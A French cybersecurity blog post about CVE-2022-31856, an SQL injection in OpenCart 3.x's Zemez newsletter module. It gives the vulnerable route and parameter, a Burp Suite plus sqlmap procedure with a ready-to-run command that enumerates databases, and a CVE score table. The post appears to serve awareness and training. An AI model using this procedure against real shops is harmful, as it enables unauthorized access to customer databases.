OpenCart faille CVE sur le module newsletter

opencart
Cliquez ici

Opencart a une nouvelle faille de type SQL INJECTION sur le module newsletter en version v3.x.

la cyberattaque se fait via le paramètre emez_newsletter_email accessible depuis l’url /index.php?route=extension/module/zemez_newsletter/addNewsletter

 

 

Procédure

Vous aurez besoin de burpsuite et sqlmap .

Avec Burpsuite rendez vous dur l url :

http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter

enregistrer la requête puis avec sqlmap :
 

				
					sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs
Information Valeur

CVE
CVE-2022-31856

CVE publié le

05/07/2022

Score
7.5

Fuite de données
Partielle

Intégrité Système
Partielle

Impact sur les ressources
Partielle

Compléxité
Facile

Authentification requise
Non

Vous avez besoin d'aide ?

Contactez nous !!!

6ber-network est un site francophone d’informations et de formations sur la Cyber-Sécurité.

  • Tutorials
  • Resources
  • Guides
  • Docs

A Propos

  • Community
  • Blog